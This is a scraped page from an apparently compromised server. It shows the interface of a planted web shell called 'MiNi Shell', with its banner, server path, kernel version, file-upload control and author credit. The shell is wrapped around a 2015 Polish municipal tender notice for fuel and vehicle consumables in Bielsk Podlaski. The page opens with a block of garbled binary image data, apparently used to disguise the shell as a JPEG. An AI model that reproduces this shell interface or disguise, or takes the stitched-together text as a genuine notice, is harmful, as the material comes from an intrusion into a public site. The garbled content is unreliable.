JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151124/171889-N-2015.html

<p class="kh_header"><b>Bielsk Podlaski: Dostawa oleju napędowego (ON), benzyny bezołowiowej 95 oraz materiałów eksploatacyjnych dla potrzeb Gminy Bielsk Podlaski od 01 stycznia 2016 r. do 31 grudnia 2016 r</b><br>
<b>Numer ogłoszenia: 171889 - 2015; data zamieszczenia: 24.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bielsk Podlaski , ul. Mickiewicza 46, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 085 7306851, 7305031, faks 085 7302015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielskpodlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oleju napędowego (ON), benzyny bezołowiowej 95 oraz materiałów eksploatacyjnych dla potrzeb Gminy Bielsk Podlaski od 01 stycznia 2016 r. do 31 grudnia 2016 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w rozumieniu pkt 3.4 SIWZ oleju napędowego (ON) w ilości szacunkowej 130 000 litrów oraz benzyny bezołowiowej 95 w ilości szacunkowej 2000 litrów oraz materiałów eksploatacyjnych do pojazdów i urządzeń Gminy Bielsk Podlaski.
Paliwa mają spełniać wymagania oraz obowiązujące normy określone w Rozporządzeniu Ministra Gospodarki z dnia 09 grudnia 2008 r. w sprawie wymagań jakościowych dla paliw ciekłych (j.t. Dz. U. z 2013 r., poz. 1058 z późn. zm.).
Wykonawca zagwarantuje dostawę paliw odpowiednio do okresu ich stosowania:
w okresie letnim tzw. paliwa letnie, w okresie zimowym tzw. paliwa zimowe, a w
okresie przejściowym tzw. paliwa przejściowe.
Dostawa będzie realizowana na zasadzie doraźnych tankowań pojazdów i urządzeń do zbiornika pojazdów i urządzeń oraz tankowań do karnistrów w wybranej stacji Wykonawcy, który złoży najkorzystniejszą ofertę. Zamawiający nie przewiduje używania kart paliwowych (flotowych).
Przez wybraną stację wykonawcy, o której mowa, należy rozumieć stację Wykonawcy, który złożył najkorzystniejszą ofertę, jeżeli stacja ta znajduje się w granicach administracyjnych miasta Bielsk Podlaski.
Tankowanie pojazdów maszyn i urządzeń odbywać się będzie w godzinach pracy stacji czynnej minimum 8 godz. na dobę. Godzina otwarcia stacji nie później niż 6:30.
W nagłych wypadkach (klęska żywiołowa, akcja związana z zimowym utrzymaniem dróg, itp.) Wykonawca umożliwi zatankowanie pojazdu w innych godzinach, na telefoniczne zapotrzebowanie.
Niezależnie od liczby innych klientów, każdy pojazd Zamawiającego winien być zatankowany w czasie nie dłuższym jak 10 minut od zgłoszenia się kierowcy do pracownika stacji.
Zakres zamówienia w ilościach szacunkowych.
Zakres zamówienia obejmuje:
dostawę oleju napędowego (ON) - 130 000 litrów
dostawę benzyny bezołowiowej 95 - 2000 litrów
dostawę materiałów eksploatacyjnych do pojazdów i urządzeń Gminy Bielsk Podlaski w ilościach szacunkowych:
oleje silnikowe:
Klasy lepkości:
15W40 - 1200 litrów
10W40 - 300 litrów
5W40 - 400 litrów
5W30 - 120 litrów
Olej do silników dwusuwowych - 10 litrów
oleje hydrauliczne
Klasa lepkości:
46 - 200 litrów
oleje przekładniowe:
Klasa lepkości:
80W - 220 litrów
smary stałe- 45 kg
płyny hydrauliczne do układów hamulcowych - 25 litrów
płyny do układów chłodzenia - 610 litrów
płyny do układów wspomagania - 2 litry
płyny letnie do spryskiwaczy - 90 litrów
płyny zimowe do spryskiwaczy - 260 litrów
płyny uszlachetniające do oleju napędowego zabezpieczające przed zamarzaniem - 12 litrów
płyny lub pianki do czyszczenia i konserwacji tworzyw wnętrza i zewnętrznych elementów samochodów i urządzeń - 160 litrów
płyny lub pianki do czyszczenia i konserwacji tapicerki samochodów i urządzeń - 25 szt.
odświeżacze powietrza - 3 szt.
ściereczki, gąbki - 10 szt.
skrobaki do szyb - 10 szt.
Określone ilości paliw oraz materiałów eksploatacyjnych są średnimi ilościami szacunkowymi i jako takie nie mogą stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń co do ilości paliw płynnych oraz materiałów eksploatacyjnych faktycznie zakupionych przez Zamawiającego w toku realizacji umowy, w sprawie niniejszego zamówienia publicznego. Wskazane ilości służą do możliwości wyliczenia przez Wykonawcę ceny oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4, 09.21.10.00-1, 09.21.11.00-2, 09.21.14.00-5, 39.83.15.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli posiada koncesję na obrót paliwami ciekłymi zgodnie z ustawą z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (j.t. Dz. U. z 2015 r., poz. 584 z późn. zm.) oraz ustawą Prawo energetyczne (j.t. Dz.U. z 2012 r., poz. 1059 z późn.zm.).
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o koncesję na obrót paliwami ciekłymi. Z treści dokumentu musi jednoznacznie wynikać, iż w/w warunek Wykonawca spełnił. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w/w warunek musi być spełniony co najmniej przez jednego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem załącznika nr 3 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w/w warunek musi być spełniony co najmniej przez jednego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem załącznika nr 3 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w/w warunek musi być spełniony co najmniej przez jednego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem załącznika nr 3 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w/w warunek musi być spełniony co najmniej przez jednego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia co najmniej 500.000,00 zł. W przypadku podmiotów działających wspólnie (konsorcja), każdy podmiot musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności bez względu na wysokość sumy ubezpieczenia. Dopuszcza się sumowanie wartości polis poszczególnych podmiotów celem uzyskania wartości nie mniejszej niż wymagana kwota. Na potwierdzenie spełniania tego warunku Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Jeżeli z treści polisy/dokumentu nie wynika fakt, że polisa została opłacona, do oferty należy dołączyć dokumenty potwierdzające, że na dzień składania ofert była opłacona (dowód wpłaty, potwierdzenie dokonania przelewu, potwierdzenie towarzystwa ubezpieczeniowego lub inne).
Przy dokonywaniu oceny spełniania warunku Zamawiający będzie się kierował regułą spełnia/nie spełnia. Z treści dokumentu musi jednoznacznie wynikać, iż w/w warunek Wykonawca spełnił. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa).
Zgodnie z art. 26 ust. 2b Wykonawca może polegać na zdolnościach ekonomicznych i finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z Wykonawcą. W przypadku, gdy Wykonawca będzie polegał na zdolnościach ekonomicznych i finansowych innych podmiotów zobowiązany jest przedłożyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia z wykorzystaniem załącznika nr 5 do SIWZ. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Uwaga: W przypadku, gdy Wykonawca nie zamierza korzystać przy wykonywaniu niniejszego zamówienia z zasobów innego podmiotu, wówczas na powyższym załączniku pisze NIE DOTYCZY, podpisuje go i załącza do oferty. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca: opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz OFERTA-zał. nr 1 do SIWZ, wypełniony formularz cenowy-zał. nr 1A do SIWZ, pełnomocnictwo -jeżeli jest wymagane, oświadczenie z art. 22 ust. 1-zał. nr 3 do SIWZ, oświadczenie dotyczące przynależności wykonawcy do tej samej grupy kapitałowej-zał. nr 6 do SIWZ, oświadczenie zobowiązanie podmiotu do oddania do dyspozycji zasobów na potrzeby wykonania zamówienia-zał. nr 5 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty na podstawie, której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy w szczególności:
termin realizacji dostawy o którym mowa w § 2 ust 3 umowy można zmienić wyłącznie:
a) w wyniku działania sił wyższych,
b) przedłużenia procedury przetargowej,
wysokość wynagrodzenia może ulec zmianie w wyniku:
a) zmiany stawki podatku od towarów i usług (VAT), jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,
b) zmiany wynagrodzenia Wykonawcy w wypadkach uzasadnionych zmianą cen przedmiotu zamówienia na terenie Rzeczpospolitej Polskiej,
c) zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy - na skutek zmian przepisów prawnych,
d) rezygnacji z części dostawy przez Zamawiającego,
e) zmiany umowy w postaci skrócenia terminu realizacji umowy,
zmiana innych postanowień umowy w wypadku, gdy:
a) zmiany uzasadnione są okolicznościami, o których mowa w art. 3571 Kodeksu cywilnego.
Sposób inicjowania zmian:
a) Zamawiający informuje pisemnie Wykonawcę o konieczności dokonania wskazanej zmiany,
b) Wykonawca wnioskuje na piśmie pod rygorem nieważności do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany.
Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (protokole ustaleń, pismo wykonawcy, notatka służbowa, itp.).
Zmiana umowy dokonana z naruszeniem przepisu ust. 1 jest nieważna.
Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:
zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego stron),
zmiany danych teleadresowych stron, zmiany osób wskazanych do kontaktów miedzy stronami.
Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielskpodlaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bielsk Podlaski
ul. Mickiewicza 46
17-100 Bielsk Podlaski
pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2015 godzina 10:00, miejsce: Urząd Gminy Bielsk Podlaski
ul. Mickiewicza 46
17-100 Bielsk Podlaski
Biuro Podawcze Urzędu Gminy Bielsk Podlaski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com